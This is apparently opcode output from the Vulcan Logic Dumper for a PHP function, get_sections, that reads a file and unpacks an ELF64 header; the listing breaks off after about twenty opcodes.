2 jumps found. (Code = 44) Position 1 = 93, Position 2 = 51
Branch analysis from position: 93
Branch analysis from position: 51
Branch analysis from position: 57
2 jumps found. (Code = 44) Position 1 = 93, Position 2 = 51
Branch analysis from position: 93
Branch analysis from position: 51
Branch analysis from position: 24
2 jumps found. (Code = 44) Position 1 = 45, Position 2 = 24
Branch analysis from position: 45
Branch analysis from position: 24
filename:       /in/4voOh
function name:  get_sections
number of ops:  95
compiled vars:  !0 = $filename, !1 = $elf64_header, !2 = $elf64_sh, !3 = $buf, !4 = $hdr, !5 = $sections, !6 = $i, !7 = $data, !8 = $str_section, !9 = $ret_sections, !10 = $v
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   43     0  E >   RECV                                             !0      
   44     1        ASSIGN                                                   !1, <array>
   55     2        ASSIGN                                                   !2, <array>
   62     3        INIT_FCALL                                               'file_get_contents'
          4        SEND_VAR                                                 !0
          5        DO_ICALL                                         $13     
          6        ASSIGN                                                   !3, $13
   63     7        INIT_FCALL                                               'ustruct'
          8        SEND_VAR                                                 !1
          9        INIT_FCALL                                               'substr'
         10        SEND_VAR                                                 !3
         11        SEND_VAL                                                 0
         12        SEND_VAL                                                 64
         13        DO_ICALL                                         $15     
         14        SEND_VAR                                                 $15
         15        DO_FCALL                                      0  $16     
         16        ASSIGN                                                   !4, $16
   64    17        ROPE_INIT                                     3  ~19     '%5B%3E%3E%5D+'
         18        ROPE_ADD                                      1  ~19     ~19, !0
   

Generated using Vulcan Logic Dumper, using php 8.0.0

